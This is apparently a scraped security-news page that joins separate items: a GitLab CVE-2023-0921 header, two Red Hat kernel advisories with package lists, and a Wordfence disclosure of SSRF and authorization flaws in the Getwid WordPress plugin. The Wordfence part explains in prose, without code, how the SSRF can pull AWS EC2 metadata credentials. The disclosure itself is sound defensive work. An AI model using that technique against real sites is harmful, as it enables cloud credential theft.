A lack of length validation in GitLab CE/EE affecting all versions from 8.3 before 15.10.8, 15.11 before 15.11.7, and 16.0 before 16.0.2 allows an authenticated attacker to create a large Issue description via GraphQL which, when repeatedly requested, saturates CPU usage.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Topics Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

*   cves
*   2023
*   **CVE-2023-0921.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 10 new advisories · c4fb8467
    
    🤖 GitLab Bot 🤖 authored Jun 06, 2023
    
    c4fb8467

CVE-2023-0921: 2023/CVE-2023-0921.json · master · GitLab.org / cves · GitLab

Red Hat Security Advisory 2023-3465-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:3465-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3465  
Issue date:        2023-06-06  
CVE Names:         CVE-2023-0461 CVE-2023-2008 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* kernel: udmabuf: improper validation of array index leading to local  
privilege escalation (CVE-2023-2008)

* kernel: use-after-free in Netfilter nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Intel QAT Update - (kernel changes) (BZ#2176848)

* Significant performance drop for getrandom system call when FIPS is  
enabled (compared to RHEL 8) (BZ#2183477)

* Azure RHEL9 Backport upstream commit  
93827a0a36396f2fd6368a54a020f420c8916e9b [KVM: VMX: Fix crash due to  
uninitialized current_vmcs] (BZ#2186824)

* kernel[-rt]: task deadline_test:1778 blocked for more than 622 seconds  
(BZ#2188657)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets  
2186862 - CVE-2023-2008 kernel: udmabuf: improper validation of array index leading to local privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm

noarch:  
kernel-doc-5.14.0-70.58.1.el9_0.noarch.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-matched-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-devel-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-devel-matched-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-devel-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-devel-matched-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-headers-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kernel-5.14.0-70.58.1.el9_0.src.rpm

aarch64:  
bpftool-5.14.0-70.58.1.el9_0.aarch64.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-core-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-libs-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm

noarch:  
kernel-abi-stablelists-5.14.0-70.58.1.el9_0.noarch.rpm

ppc64le:  
bpftool-5.14.0-70.58.1.el9_0.ppc64le.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-core-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-libs-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm

s390x:  
bpftool-5.14.0-70.58.1.el9_0.s390x.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-core-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-core-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-extra-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm

x86_64:  
bpftool-5.14.0-70.58.1.el9_0.x86_64.rpm  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-core-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-core-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-modules-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-modules-extra-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-modules-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-modules-extra-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-libs-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
kernel-tools-libs-devel-5.14.0-70.58.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.aarch64.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
kernel-tools-libs-devel-5.14.0-70.58.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-cross-headers-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
kernel-tools-libs-devel-5.14.0-70.58.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.58.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-2008  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH8fhdzjgjWX9erEAQjndA//UpRBwgHz32ghunmBO+fNfeWyHc8iYacs  
pblLL1XPHvdAIZQd/lNJ66EJt2GSNYOB1mLaem7ovXOFUpa/4GdKsFalxFSvyeRS  
msMDfjqt71Qa+iAa3u6+cn9GOgwjijUVjS6DtoMJzPNIIEViDEaYYVJNrxMyMVt9  
M+K/lETdq9SyVxXwWDQs47Y44677PJjGIf6rg8WPjgkZalEf94MxRLQ60pmM6AU0  
a77urCDLwioSGTxoJ5dzyPRxazJM+tqwWaZlsa37c0MB22yk9N+dIpmMhSU+yAPL  
OJQHxmCX3FfQkewlAq90Yc//zCUdmc/+XpUv+sBVOAcCuc3U9Mrhx7BY9YctUPNV  
V2ixlUEj2Rgr7b2boPJNWDM4lAS8WN4OEGcrpNbtYRHrNfS6+7pWcJXpO8s5S+ZU  
aUpRHq0mrWj7Vwew0YQFeO0l6dF40bWXAkvlWRfJyG2NQR6TGNuPDmgkxX1Kifbf  
+Xfsw/bljKkTSZajmiEjKC/0b6J8a2aeIsQZRTkf8g9OyZR6DJTNjdXd99Utwekb  
OaGpRUBoIottSNn1Su1jb3U+N85DBlGinAEEnfZVTur3GjO+o/Tx4bhgvm58WCy3  
t7OrMG0wh3Bx9W6QVnkwh374ejTkfsfN+n4mGnTiIWG1GiukbFSYYJuFipaGUcu5  
KKIPwXF9gSY=  
=sBr4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3465-01

WordPress Getwid Gutenberg Blocks plugin versions 1.8.3 and below suffer from improper authorization and server-side request forgery vulnerabilities.

    On April 6, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for two vulnerabilities in Getwid – Gutenberg Blocks, a plugin installed on over 50,000 WordPress sites. The plugin’s developers responded immediately, and we sent over the full disclosure the same day. A patched version of the plugin, 1.8.4, was released on April 13, 2023.The most serious vulnerability had a high severity because it allows authenticated users to perform Server Side Request Forgery (SSRF), which can result in full access to the hosted instance on some cloud configurations. Additionally, it may allow further penetration into internal networks in some enterprise configurations. The other vulnerability is much lower in severity and allows authenticated users to clear and update the site’s template cache.Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule protecting against the Server Side Request Forgery (SSRF) on April 6, 2023. Wordfence Free users received the same protection on May 6, 2023.READ THIS POST ON THE BLOGVulnerability Summary from Wordfence IntelligenceDescription: Getwid – Gutenberg Blocks <= 1.8.3 - Authenticated(Subscriber+) Server Side Request Forgery Affected Plugin: Getwid – Gutenberg BlocksPlugin Slug: getwidAffected Versions: <= 1.8.3CVE ID:CVE-2023-1895CVSS Score: 8.8 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:NResearcher/s: Ramuel Gall Fully Patched Version: 1.8.4The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to Server Side Request Forgery via the get_remote_content REST API endpoint in versions up to, and including, 1.8.3. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.Description: Getwid – Gutenberg Blocks <= 1.8.3 - Improper Authorization via get_remote_templates REST endpoint Affected Plugin: Getwid – Gutenberg BlocksPlugin Slug: getwidAffected Versions: <= 1.8.3CVE ID: CVE-2023-1910CVSS Score: 4.3 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NResearcher/s: Ramuel Gall Fully Patched Version: 1.8.4The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient capability check on the get_remote_templates function in versions up to, and including, 1.8.3. This makes it possible for authenticated attackers with subscriber-level permissions or above to flush the remote template cache. Cached template information can also be accessed via this endpoint but these are not considered sensitive as they are publicly accessible from the developer's site.Technical AnalysisGetwid – Gutenberg Blocks is a plugin offering a library of pre-generated blocks which it makes available to plugin users and retrieves remotely from the developer’s server. Unfortunately, this remote retrieval functionality, which utilized the REST API, only required an authenticated user in vulnerable versions, meaning that even subscriber-level users could make use of it.While the rest routes for both vulnerabilities used a capability check in the permissions_check function, the capability checked was 'read', which all users, even subscribers, are assigned.register-rest functionality Pictured: The REST API Endpoints and the permissions_check functionOn its own this was not a significant issue, but the get_remote_content function also failed to validate the URL passed in, meaning it could be used to retrieve information from any location via the server.get_remote_content function Pictured: The get_remote_content functionOnly GET requests can be performed and the response data will only be rendered if it is JSON-formatted. However, sites hosted on Amazon AWS EC2 instances all have an endpoint which can be accessed internally and returns JSON-formatted credentials that can be used to access the instance.SSRF response Pictured: EC2 Credentials on a test box retrieved using this exploit. Click through to the blog post and then click on the image to see it at full sizeSites running on AWS EC2 instances using IMDS (Instance Metadata Service) version 1 are vulnerable to this attack, while IMDSv2 offers preventative measures that prevent successful exploitation.The second issue was significantly less severe and made use of the minimal capability check on the ‘get_remote_templates’ function. While this would likely have minimal impact on a site, it still compromises the site’s integrity to some extent.Disclosure TimelineApril 6, 2023 - The Wordfence Threat Intelligence team releases a firewall rule to Wordfence Premium, Wordfence Care, and Wordfence Response users and begins the responsible disclosure process. We send over the full disclosure to the developers.April 13, 2023 - The plugin developers release a patch in version 1.8.4 of Getwid.May 6, 2023 - Wordfence Free users receive the firewall rule.ConclusionIn this blog post, we detailed a Server Side Request Forgery (SSRF) vulnerability in Getwid version 1.8.3 and earlier. This vulnerability allows authenticated attackers with subscriber-level permissions or higher to send arbitrary GET requests from the website, which can be used to obtain critically sensitive information in some configurations. We also described a lower-severity vulnerability allowing subscribers to clear the local template cache.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting the SSRF vulnerability on April 6, 2023. Sites still using the free version of Wordfence received the same protection on May 6, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as the SSRF vulnerability poses a significant risk. If you or someone you know is hosted on AWS we also highly recommend migrating to IMDSv2 if you have not already, as it offers protection from not only this but the vast majority of SSRF vulnerabilities.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Getwid Gutenberg Blocks 1.8.3 Improper Authorization / SSRF

Red Hat Security Advisory 2023-3462-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:3462-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3462  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-42896   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux NFV E4S (v.8.4) - x86_64  
Red Hat Enterprise Linux NFV TUS (v.8.4) - x86_64  
Red Hat Enterprise Linux RT TUS (v.8.4) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the RHEL-8.4.z17 source tree  
(BZ#2185910)

* RHEL-8.7 kernel-rt: INFO: task deadline_test:2526 blocked for more than  
600 seconds. (BZ#2188652)

* Crash: kernel BUG at kernel/locking/rtmutex.c:1338! (BZ#2188725)

* kernel-rt: workqueue: Fix divergence from stock 8.4 (BZ#2209152)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux NFV E4S (v.8.4):

Source:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm

Red Hat Enterprise Linux NFV TUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm

Red Hat Enterprise Linux RT TUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
